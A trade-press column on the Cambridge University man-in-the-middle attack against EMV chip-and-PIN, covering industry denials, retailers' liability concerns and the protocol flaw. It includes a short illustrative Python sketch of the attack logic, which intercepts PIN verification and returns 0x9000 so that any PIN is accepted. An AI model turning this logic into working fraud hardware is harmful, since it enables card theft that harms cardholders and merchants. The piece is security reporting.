As reactions to the report's man-in-the-middle attack methodology piled on, it was eerie how perfunctory the denials were, even among the most aggressive EMV advocates. My personal favorite is a statement that banking giant HSBC Group issued in the U.K. to the BBC: "Although they have raised a clear security concern with regards to chip-and-PIN, which we are taking very seriously, the problem highlighted is relevant to all card issuers and not just HSBC." The bank didn't even bother denying that the university's hack worked.
For years, security aficionados have pushed chip-and-PIN while conceding that it's probably still better than what's being done in the U.S. (formally called the "Hope And Pray They Don't Take My Lunch Money Today" protocol). But the subtext that it's not really all that secure is almost always present.
(For more on this topic, check out Walter Conway’s latest StorefrontBacktalk column, “Chip-And-PIN Is Not A Free Pass On PCI.”)
We'll get into the details of the Cambridge report in a moment. In the meantime, it’s important to point out that the biggest criticism of this report is that the equipment needed to hack chip-and-PIN is too bulky for the attacks to actually happen without cashiers noticing. That argument was effectively obliterated by a wonderful piece of video journalism from the BBC, which filmed one of the Cambridge researchers actually using this attack—successfully—at a wide range of retail locations with cards borrowed from BBC staffers. Seeing the attack in action makes two things clear: It's not merely theoretical, and it's eminently practical. The movements of the pretend cyberthief were natural and not at all suspicious.
Retail IT execs specializing in security were especially concerned about the relative ease of the university hack execution. Braden Black, a senior enterprise architect (and security specialist) for 305-store shoe chain DSW, said that, in his opinion, the biggest problem with chip-and-PIN—as it’s currently deployed—is that banks have little incentive to make these systems secure because they no longer have any liability if they're repeatedly breached. That liability has been pushed to the retailers.
"The ramifications of this attack are most disturbing when viewed in light of the fraud liability regulations that were adopted alongside the technology. Essentially, the banks offloaded fraud liability to merchants and cardholders. In this case, specifically, the attack vector exploited a flaw in the EMV PIN verification protocol causing a transaction to appear to the bank to be PIN-verified while the chip believes that signature-based verification is taking place. One no longer needs any knowledge of the PIN to authorize a transaction," Black said. "This places the onus of liability upon the cardholder, who is assumed to be liable for the fraudulent transaction unless they can demonstrate that they were not present for the transaction and did not disclose their PIN code."Black added that it's the liability split that dictates who has the incentive to properly safeguard systems. "Most importantly, with the legislation in place to shift liability to merchants and cardholders, the banks have little incentive to improve the system--their cost savings have already been achieved. However, neither the merchants nor the cardholders can effect any changes to the security model for the system," he said. "Chip-and-PIN is dangerous, not due to the security issues but because the accompanying legislation has disconnected the incentive to continue the security development lifecycle from the parties that are directly responsible for it."
Another IT security manager—albeit with an even larger chain—said industry officials who try to defend EMV by poking holes in the Cambridge report are doing little more than "damage control" and that their defenses "don't forgive a broken protocol."
But that security manager added that, given the effort required, the university hack is unlikely—right away—to be used widely. Variations of it, however, will almost certainly materialize and then quickly mushroom. "This is probably not a serious threat for some time to come. But attackers never get less effective. And I don't think they'll have fixed the problem by the time we see some actual criminals exploiting it."
The Cambridge report details an approach that tricks both the chip and the card reader into believing that the other has given the transaction its blessing.
"The central flaw in the protocol is that the proceedings of the PIN verification step are never explicitly authenticated. Whilst the authenticated data sent to the bank contains two fields which incorporate information about the result of the cardholder verification, they do not together provide an unambiguous encoding of the events which took place," the report said. The terminal verification results (TVR) "merely enumerates various possible failure conditions for the authentication and, in the event of success, does not indicate which particular method was used. Therefore, a man-in-the-middle device, which can intercept and modify the communications between card and terminal, can trick the terminal into believing that PIN verification succeeded by responding with 0x9000 to Verify, without actually sending the PIN to the card."
The report continued with a description of the attack technique. "A dummy PIN must be entered, but the attack allows any one to be accepted. The card will then believe that the terminal did not support PIN verification, and has either skipped cardholder verification or used a signature instead," the report said. "Because the dummy PIN is never sent to the card, the PIN retry counter is not altered. Neither the card nor terminal will spot this subterfuge, because the cardholder verification byte of the TVR is only set if PIN verification has been attempted and failed. The terminal believes that PIN verification succeeded (and so generates a zero byte), and the card believes it was not attempted, so it will accept the zero byte."
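To make the mechanics concrete, the wedge the report describes boils down to a few lines of logic. The Python sketch below is purely illustrative: the function and constant names are invented here, it assumes a hypothetical relay interface sitting between card and terminal, and it is not the researchers' actual hardware or software.

# Illustrative sketch only: models the man-in-the-middle logic described
# in the report, not the Cambridge team's implementation.

SW_SUCCESS = bytes([0x90, 0x00])  # ISO 7816 status word for "command succeeded"
INS_VERIFY = 0x20                 # instruction byte of the VERIFY (PIN check) command

def relay_apdu(command: bytes, forward_to_card) -> bytes:
    """Relay terminal-to-card commands, intercepting only VERIFY.

    When the terminal sends the (dummy) PIN for verification, answer
    0x9000 ("PIN correct") directly and never forward the command. The
    card sees no PIN attempt, so its retry counter is untouched and it
    assumes a signature or no cardholder verification was used, while
    the terminal records that PIN verification succeeded.
    """
    ins = command[1]                 # APDU layout: CLA, INS, P1, P2, ...
    if ins == INS_VERIFY:
        return SW_SUCCESS            # lie to the terminal; never send the PIN on
    return forward_to_card(command)  # everything else passes through unchanged

Every other part of the transaction, including the card's cryptographic authentication, proceeds untouched, and the report goes on to explain why neither the terminal nor the issuer can spot the mismatch afterward.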
"The IAD does often indicate whether PIN verification was attempted; however, it is in an issuer-specific proprietary format, and not specified in EMV. Therefore, the terminal (which knows the cardholder verification method chosen) cannot decode it. The issuer, which can decode the IAD, does not know which cardholder verification method was used, and so cannot use it to prevent the attack," the report said. "Because of the ambiguity in the TVR encoding, neither party can identify the inconsistency between the cardholder verification methods they each believe were used. The issuer will thus believe that the terminal was incapable of soliciting a PIN, which is an entirely plausible, yet inaccurate, conclusion."The most comprehensive—albeit mysterious—attack on the Cambridge report was contained in a story from SecureIDNews. This story said that, "The Smart Card Alliance has reviewed the hack along with other industry organizations and concluded that widespread implementation of this attack is unlikely." The mysterious part is that, according to Smart Card Alliance Spokeswoman Deb Montner, the Smart Card Alliance--to her knowledge--has reached no such conclusions and has issued no such statement.
Well, no matter its source, the points are reasonable enough challenges to some of the Cambridge University report's details. First are questions about the practicality of using a stolen EMV card before the card is reported missing. The SecureIDNews story also said the hack's damage potential couldn't extend to ATMs for cash withdrawals, "as ATMs rely on an online PIN verification."
The report attributed to the Smart Card Alliance also raised two weaker challenges, namely that the attack couldn't work in the real world (something the BBC video of it happening in the real world tends to disprove) and that "the attack is technically difficult, requiring highly sophisticated software and customized hardware that could only be created by individuals with extensive knowledge of EMV protocols." Cyberthieves with a shot at the millions of British EMV cards? They tend to be very quick studies and, by the way, will be much better funded than a university research team.
DSW's Black also questioned this argument, saying that it flies in the face of the history of cyberthief gangs. "Cookie-cutter solutions are only a matter of time. By way of example, look at PIN pad skimmers and the multitude of hacking frameworks and tools that require little or no knowledge of the underlying protocols," he said.
Another criticism in the report attributed to the Smart Card Alliance: "Such an attack would not compromise the smart card, as the PIN would still remain secure inside the card." Black argued that this defense misses the point: "With this attack, knowledge of the PIN is extraneous."
To a major extent, these are all—on both sides—nitpicks. The big-picture point is that this Cambridge report makes it clear how flawed chip-and-PIN currently is. Can these flaws be fixed? Yes, and rather quickly, too. But should the payments industry sit around and wait for a university to point out huge security holes?
If the industry were more stunned by these revelations, it would be more comforting. But the muted reactions confirm that holes of this nature are well known. Not the specific holes, perhaps. But it's not a surprise to anyone that the protocol was not written with airtight security in mind.
It reminds me of my early reporting career, when I spent years investigating semi-corrupt government agencies and politicians in New Jersey. The surprise was never that a particular politician was crooked. Rather, it was that someone had bothered to prove it.